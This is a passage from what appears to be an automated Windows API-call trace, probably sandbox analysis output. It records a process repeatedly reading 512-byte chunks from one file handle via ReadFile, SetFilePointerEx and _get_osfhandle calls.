out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.608] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.609] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.609] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.609] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.609] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.609] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.609] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.609] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.609] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.609] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.609] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.609] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.610] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.610] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.610] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.610] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.610] 
SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.610] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.610] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.610] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.610] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.610] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.611] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.611] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.611] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.611] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.611] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.611] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.611] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.611] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.611] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.611] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.611] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.612] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.612] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.612] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.612] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.612] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.612] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.612] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.612] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.612] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.612] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.612] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.612] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.612] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.612] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.612] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, 
lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.613] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.613] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.614] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, 
lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.615] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 
[0107.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.616] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
